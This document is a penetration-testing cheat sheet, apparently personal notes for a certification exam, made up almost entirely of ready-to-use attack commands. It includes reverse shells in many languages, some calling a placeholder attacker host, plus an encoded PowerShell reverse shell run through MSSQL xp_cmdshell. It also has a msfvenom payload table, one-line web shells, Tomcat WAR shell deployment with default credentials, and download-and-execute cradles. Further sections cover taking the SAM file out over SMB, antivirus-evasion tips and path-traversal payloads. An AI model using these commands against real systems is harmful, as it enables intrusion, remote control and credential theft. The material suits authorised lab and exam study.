Shells, Transfers, and Exploit Workflow Reference
Searchsploit and Exploit Workflow
Finding Exploits
searchsploit <service> <version> # exact match
searchsploit <service> # broader — if exact version returns nothing
searchsploit -m <exploit-path> # copy exploit to current directory
searchsploit -p <exploit-id> # show full path
searchsploit -u # update database
Tips: Search broad first, then narrow. Apache 2.4.49 returns nothing? Try Apache 2.4. Always also Google: <service> <version> exploit github.
Before Running Any Exploit
- Read the code — understand what it does
- Check variables — look for hardcoded IP, port, path, username at the top
- Check target — does the exploit match the exact version AND architecture (32 vs 64)?
- Set up listener before executing
- If exploit fails — read error output, check architecture, try a different PoC from GitHub
Compiling Exploits
# C for Linux
gcc exploit.c -o exploit
gcc -m32 exploit.c -o exploit # 32-bit
gcc exploit.c -o exploit -static # static (no dependency issues on target)
# C for Windows (cross-compile on Kali)
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe # 64-bit
i686-w64-mingw32-gcc exploit.c -o exploit.exe # 32-bit
# ⚠️ Network exploits using Winsock (socket, connect, send, recv) NEED -lws2_32:
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
# Undefined reference to WSAStartup/socket/connect? → add -lws2_32
# Python — just run it
python3 exploit.py
pip install <missing-module> # if dependencies missing
Reverse Shells
The best way for windows powershell one liner is:
1- Get a Powershell #2 from revshells.com ( important only copy the unquoted part (“copy this “) 2- go to cyberchef.com 3- Pase the rev shell we will use 4- Choose ’encode text’ and pick Encoding ‘UTF-16LE (1200)’ 5- Chose base64 and encode 6- Copy paste the output
Always set up listener first:
rlwrap nc -lvnp 4444 # basic (use rlwrap for arrow keys)
# Socat stable TTY (best quality shell if socat available on target)
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Target: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:4444
Best way for reverse shell on mssql:
SQL (SIGNED\Administrator dbo@master)> EXEC xp_cmdshell 'powershell -exec -bypass -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAzADcAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA';
Linux Shells
bash -c 'bash -i >& /dev/tcp/$KALI/4444 0>&1'
# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# PHP
php -r '$sock=fsockopen("ATTACKER",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Netcat
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $KALI 4444 >/tmp/f
# Perl
perl -e 'use Socket;$i="ATTACKER";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Windows Shells — Step by Step (try in this order)
GOLDEN RULE: Don’t fight quoting. Upload a file and execute it. Use
C:\Windows\Temp\— it ALWAYS exists.C:\Temp\often doesn’t. Port 4444 blocked? Try 80 or 443 — firewalls allow web ports.
STEP 1: Upload nc.exe to target (pick one method)
# From Kali — host nc.exe
cp /usr/share/windows-resources/binaries/nc.exe . && python3 -m http.server 80
# On target — download it (try these in order until one works)
certutil -urlcache -f http://YOUR_IP/nc.exe C:\Windows\Temp\nc.exe
powershell -c "curl http://YOUR_IP/nc.exe -o C:/Windows/Temp/nc.exe"
powershell -c "(New-Object Net.WebClient).DownloadFile('http://YOUR_IP/nc.exe','C:\Windows\Temp\nc.exe')"
STEP 2: Start listener on Kali
rlwrap nc -nlvp 80 # use port 80 or 443 if 4444 is blocked
STEP 3: Execute nc.exe on target
C:\Windows\Temp\nc.exe YOUR_IP 80 -e cmd.exe
IF nc.exe doesn’t work, try PowerShell base64 (no quoting issues):
# On Kali — generate base64 encoded reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=80 -f psh -o shell.ps1
cat shell.ps1 | iconv -t UTF-16LE | base64 -w 0
# Copy the output
# On target — execute (one string, no quotes to break)
powershell -e <PASTE_BASE64_HERE>
IF you need a PowerShell download cradle:
# Quoting pattern: single quotes OUTSIDE, double quotes INSIDE
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_IP/shell.ps1')"
IF you’re injecting into a Python/Ruby exploit (-c flag):
# WRONG — bash doesn't exist on Windows
-c "bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'"
# RIGHT — use PowerShell base64 (no quoting conflicts)
-c 'powershell -e <BASE64>'
# RIGHT — use nc.exe (no quoting conflicts)
-c 'C:\Windows\Temp\nc.exe YOUR_IP 80 -e cmd.exe'
# RIGHT — download then execute (single outside, double inside)
-c 'powershell -c "curl http://YOUR_IP/nc.exe -o C:/Windows/Temp/nc.exe"'
-c 'C:\Windows\Temp\nc.exe YOUR_IP 80 -e cmd.exe'
IF AV blocks your payload:
msfvenom psh payloads → often caught by Defender
nc.exe → rarely caught
msfvenom exe → sometimes caught → try exe-service or use Metasploit handler
Metasploit → use exploit/multi/handler (unrestricted on eCPPT)
WINDOWS SHELL DECISION TREE:
Need a Windows reverse shell?
│
├── Can upload files? → nc.exe (ALWAYS try this first)
│
├── Can run PowerShell? → powershell -e <BASE64>
│
├── Injecting into exploit? → -c 'powershell -e <BASE64>'
│ → or: -c 'C:\Windows\Temp\nc.exe IP PORT -e cmd'
│
├── AV blocking everything? → Metasploit (unrestricted on eCPPT)
│
└── Port blocked? → try 80 or 443 instead of 4444
HARD-LEARNED LESSONS:
1. C:\Temp might not exist. C:\Windows\Temp ALWAYS exists.
2. Port 4444 blocked? Try 80 or 443.
3. certutil blocked? Use: powershell -c "curl http://IP/file -o C:/Windows/Temp/file"
4. msfvenom psh payloads get caught by AV. nc.exe usually doesn't.
5. Quoting: single quotes outside, double quotes inside.
6. Windows has no /bin/bash. Stop injecting Linux payloads into Windows exploits.
msfvenom Payload Matrix
| Format | Command |
|---|---|
| Linux ELF | msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o shell.elf |
| Windows EXE | msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o shell.exe |
| Windows DLL | msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f dll -o shell.dll |
| MSI | msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f msi -o shell.msi |
| ASP | msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f asp -o shell.asp |
| ASPX | msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f aspx -o shell.aspx |
| JSP | msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw -o shell.jsp |
| WAR | msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f war -o shell.war |
| PHP | msfvenom -p php/reverse_php LHOST=ATTACKER LPORT=4444 -f raw -o shell.php |
| HTA | msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f hta-psh -o shell.hta |
C:\temp\nc.exe ATTACKER 4444 -e cmd.exe
Groovy Reverse Shell (Jenkins Script Console)
String host="ATTACKER";int port=4444;String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try{p.exitValue();break;}catch(Exception e){}};p.destroy();s.close();
For Linux Jenkins: change cmd.exe to /bin/bash.
Tomcat WAR Shell Deployment
If you have Tomcat Manager creds (try tomcat:s3cret, admin:admin):
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f war -o shell.war
curl -u 'tomcat:s3cret' --upload-file shell.war "http://$ip:8080/manager/text/deploy?path=/shell"
curl http://$ip:8080/shell/ # triggers reverse shell
Web Shells
<?php system($_GET['cmd']); ?>
<% Set o = Server.CreateObject("WSCRIPT.SHELL") : Set x = o.exec("cmd /c " & Request("cmd")) : Response.Write x.StdOut.ReadAll %>
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
Shell Upgrade (Linux — do IMMEDIATELY after landing)
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Ctrl+Z (background)
stty raw -echo; fg
# Press Enter twice
export TERM=xterm-256color
stty rows 50 cols 200
Windows: use rlwrap nc -lvnp 4444 when catching shells.
File Transfers
Linux Target
# HTTP (most common — attacker runs: python3 -m http.server 80)
wget http://ATTACKER/file -O /tmp/file
curl http://ATTACKER/file -o /tmp/file
# In-memory execution (no file on disk)
curl http://ATTACKER/linpeas.sh | bash
# No wget/curl available
cat < /dev/tcp/ATTACKER/80 > file.txt
# Netcat (attacker: nc -lvnp 9999 < file)
nc ATTACKER 9999 > file
# SCP (if SSH access)
scp user@ATTACKER:/path/file /tmp/file
Windows Target
certutil -urlcache -split -f http://ATTACKER/file.exe C:\Users\Public\file.exe
# PowerShell
iwr -uri http://ATTACKER/file.exe -outfile file.exe
(New-Object System.Net.WebClient).DownloadFile('http://ATTACKER/file.exe','C:\Users\Public\file.exe')
# In-memory execution (PowerShell)
IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKER/script.ps1')
# Bitsadmin (if certutil/PS blocked)
bitsadmin /transfer job /download /priority high http://ATTACKER/file.exe C:\Users\Public\file.exe
SSH Connection Troubleshooting (ARM64 Kali / Parallels)
If SSH hangs at key exchange (debug shows “expecting SSH2_MSG_KEX_ECDH_REPLY”):
# Fix: force a different key exchange algorithm
ssh -i key user@target -p PORT -o KexAlgorithms=curve25519-sha256
# If shell hangs after login, force interactive bash
ssh -i key user@target -p PORT -o KexAlgorithms=curve25519-sha256 -t "bash -i"
# Combined: port forward + working shell + kex fix
ssh -i key user@target -p PORT -o KexAlgorithms=curve25519-sha256 -t "bash -i" -L 8080:127.0.0.1:8080
SMB Server (best for Windows — handles upload AND download)
ALWAYS use -user and -password. Modern Windows (Win10/11, Server 2019+) blocks anonymous SMB with: ‘organization’s policies block unauthenticated guest access’. Anonymous SMB without creds will fail silently or error out.
If net use also fails, flip the transfer: run python3 -m http.server 8888 on the Windows target and wget from Kali instead.
# Attacker:
impacket-smbserver smb $(pwd) -smb2support -user test -password test
# Windows target:
net use \\$KALI\smb /user:test test
copy \\$KALI\smb\file.exe .
copy C:\sam \\$KALI\smb\sam # exfiltrate
net use \\ATTACKER\smb /delete
Base64 Transfer (when all else fails)
# Encode on Kali:
base64 -w 0 file.bin | xclip -selection clipboard
# Decode on Linux target:
echo 'BASE64STRING' | base64 -d > file.bin
# Decode on Windows target (PowerShell):
[IO.File]::WriteAllBytes("C:\temp\file.exe",[Convert]::FromBase64String("BASE64STRING"))
Port Scanning from Pivot Hosts (no nmap available)
From Windows
# Single port test
Test-NetConnection -Port 445 10.10.10.5
# Scan common ports on a host
@(21,22,80,135,139,445,1433,3389,5985) | % { $r = Test-NetConnection 10.10.10.5 -Port $_ -WarningAction SilentlyContinue; if($r.TcpTestSucceeded){"Port $_ OPEN"} }
# Sweep subnet for specific port
1..254 | % { Test-NetConnection "10.10.10.$_" -Port 445 -WarningAction SilentlyContinue -InformationLevel Quiet }
From Linux (no tools)
# Bash TCP scan
for port in 21 22 80 443 445 3389 5985; do (echo >/dev/tcp/10.10.10.5/$port) 2>/dev/null && echo "Port $port OPEN"; done
# Ping sweep
for i in $(seq 1 254); do (ping -c 1 -W 1 10.10.10.$i | grep "bytes from" &); done; wait
Fixing Python2 Exploits to Run on Python3
Most searchsploit exploits are Python2. They WILL crash on Python3. Here’s how to fix them fast:
| Python2 syntax | Python3 fix | What broke |
|---|---|---|
print "hello" | print("hello") | print is a function now |
print "Status: %s" % var | print("Status: %s" % var) | just add parens |
raw_input("Enter: ") | input("Enter: ") | raw_input removed |
except Exception, e: | except Exception as e: | comma syntax removed |
urllib2.urlopen(url) | urllib.request.urlopen(url) | urllib2 merged into urllib |
"string" + bytes_var | "string" + bytes_var.decode() | str/bytes are separate types |
socket.send("cmd") | socket.send(b"cmd") | sockets need bytes, not str |
data = "A" * 100 (for exploit buffers) | data = b"A" * 100 | use b”” for binary payloads |
xrange(100) | range(100) | xrange removed |
dict.iteritems() | dict.items() | iteritems removed |
dict.has_key('x') | 'x' in dict | has_key removed |
Quick fix workflow:
# Step 1: Try running it
python3 exploit.py 2>&1 | head -5
# Step 2: If SyntaxError on print, quick sed fix
sed -i 's/^\(\s*\)print \(.*\)$/\1print(\2)/' exploit.py
# ⚠️ This handles most cases but CHECK the result — complex prints may need manual fixing
# Step 3: If it needs Python2 and the fixes are too many
# Kali has Python2 or install it:
sudo apt install python2
python2 exploit.py
Nuclear option: If the exploit is too messy to fix, search GitHub for a Python3 rewrite: <CVE number> python3 exploit github
Shell Discipline (Critical for Exam)
The Problem
Blocking reverse shells (pentestmonkey, Ivan Sincek PHP shells) can hang the web server. If triggered via browser and the connection doesn’t close cleanly, the PHP process holds the Apache worker forever. Prefork MPM with 10 workers = after 10 failed shells, all workers are stuck in T state. Only an admin can kill them.
The Rules
- NEVER trigger reverse shells via browser — use curl
- PREFER command executor + backgrounded reverse shell over blocking shells
- If shell dies, type ’exit’ in nc, never Ctrl+C
- Never hit the same shell URL twice if the first didn’t return
- Stabilize immediately after catching shell
Preferred Pattern: Command Executor + Backgrounded Shell
Drop this tiny non-blocking PHP shell:
Trigger reverse shell via curl with background: curl ‘http://TARGET/cmd.php?cmd=nohup+bash+-c+%22bash+-i+%3E%26+/dev/tcp/KALI/4444+0%3E%261%22+%26’
curl -s http://$TARGET/request.php
curl -s “http://$TARGET/index.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd”
curl -s “http://$TARGET/index.php?file=….//….//….//etc/passwd”
curl -sG “http://$TARGET/index.php” \
–data-urlencode “file=simple_shell.php” \
–data-urlencode “cmd=bash -c ‘bash -i >& /dev/tcp/$KALI/443 0>&1’”
curl -sG “http://$TARGET/index.php” \
–data-urlencode “file=simple_shell.php” \
–data-urlencode “cmd=python3 -c ‘import socket,subprocess,os;s=socket.socket();s.connect(("$KALI",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])’”
curl -sG “http://$TARGET/index.php” \
–data-urlencode “file=simple_shell.php” \
–data-urlencode “cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $KALI 443 >/tmp/f” The & at the end detaches from Apache worker. Worker returns immediately. Shell runs as independent process.
For Windows (aspx)
One-liner aspx command executor: <%@ Page Language=“C#” %><% Response.Write(System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo(“cmd”,"/c “+Request[“c”]){RedirectStandardOutput=true,UseShellExecute=false}).StandardOutput.ReadToEnd()); %>
Trigger: curl ‘http://TARGET/shell.aspx?c=whoami’
Then escalate to real shell by downloading nc.exe and triggering: curl ‘http://TARGET/shell.aspx?c=powershell+-c+iwr+http://KALI/nc.exe+-o+C:\Windows\Temp\nc.exe’ curl ‘http://TARGET/shell.aspx?c=C:\Windows\Temp\nc.exe+KALI+4444+-e+cmd.exe’
After Catching Shell: Stabilize
Linux: python3 -c ‘import pty;pty.spawn("/bin/bash”)’
Ctrl+Z
stty raw -echo; fg export TERM=xterm SHELL=bash
Reset rows/cols: stty rows 50 cols 200
Windows: use evil-winrm or rdp once you have creds. For raw nc shells, accept limitations or upgrade via powershell.
Symptoms: Apache listening on port 80 but requests hang. ps shows multiple httpd workers in T state. Cause: blocking PHP reverse shells accumulating, each holding a worker. Recovery: requires root to kill processes. If you lack root, revert the box.
Prevention: use the command executor pattern above. Worker returns immediately after background detach.